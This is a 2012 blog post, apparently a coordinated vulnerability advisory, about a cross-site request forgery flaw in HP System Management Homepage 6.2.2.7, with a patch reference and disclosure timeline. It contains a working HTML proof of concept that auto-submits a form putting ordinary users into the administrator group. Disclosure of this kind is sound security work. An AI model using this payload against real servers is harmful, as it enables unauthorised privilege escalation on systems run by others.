Sunday, April 29, 2012

HP System Management Homepage 6.2.2.7 Cross-Site Request Forgery (CSRF) Vulnerability

Description
HP System Management Homepage is a web-based interface that consolidates and simplifies the management of individual ProLiant and Integrity servers running Microsoft Windows or Linux operating systems, or HP 9000 and HP Integrity servers running HP-UX 11i.

Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in HP System Management Homepage. This issue was discovered in a default installation of HP System Management Homepage 6.2.2.7. Other earlier versions may also be affected.


Proof of concept
<html>
<body>
<form action="https://[target]:2381/proxy/SetSMHData" id="csrf" method="post">
<input type="hidden" name="admin-group" value="Users" />
<input type="hidden" name="operator-group" value="" />
<input type="hidden" name="user-group" value="" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>

Solution
HP has provided HP System Management Homepage v7.0 or subsequent to resolve the vulnerabilities. Please see the references for more information.

References

Vendor URL: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03280632
Secunia: http://secunia.com/advisories/43012/

Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2012-04-11 - Advisory published by Secunia 
since it has been coordinated for more than a year.
2012-04-19 - Patch released.
2012-04-20 - Advisory updated by Secunia.

No comments:

Post a Comment